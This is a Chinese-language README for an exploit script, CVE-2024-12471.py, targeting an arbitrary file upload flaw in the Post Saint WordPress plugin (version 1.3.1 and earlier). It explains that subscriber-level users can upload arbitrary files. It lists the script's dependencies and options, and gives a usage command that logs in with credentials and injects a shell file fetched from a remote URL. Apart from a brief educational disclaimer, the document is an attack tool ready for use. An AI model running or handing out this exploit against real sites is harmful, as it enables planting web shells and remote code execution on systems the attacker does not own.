Post Saint <= 1.3.1 WordPress插件任意文件上传
Post Saint WordPress 插件(版本 1.3.1 及更早)由于缺少能力检查和文件类型验证,存在任意文件上传漏洞。经过身份验证的攻击者(至少拥有订阅者级别的访问权限)可以利用此漏洞上传任意文件,可能导致远程代码执行。
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint WordPress插件任意文件上传
选项:
-h, --help 显示此帮助信息并退出
-u URL, --url URL WordPress 站点的基本 URL
-un USERNAME, --username USERNAME
WordPress 用户名
-p PASSWORD, --password PASSWORD
WordPress 密码
-ru REMOTE_URL, --remote_url REMOTE_URL
要注入的 shell 文件的远程 URL
python CVE-2024-12471.py -u <基本URL> -un <用户名> -p <密码> -ru <远程Shell URL>
此脚本仅供教育和研究目的。未经授权在您不拥有或未获得明确测试许可的系统上使用是非法且不道德的。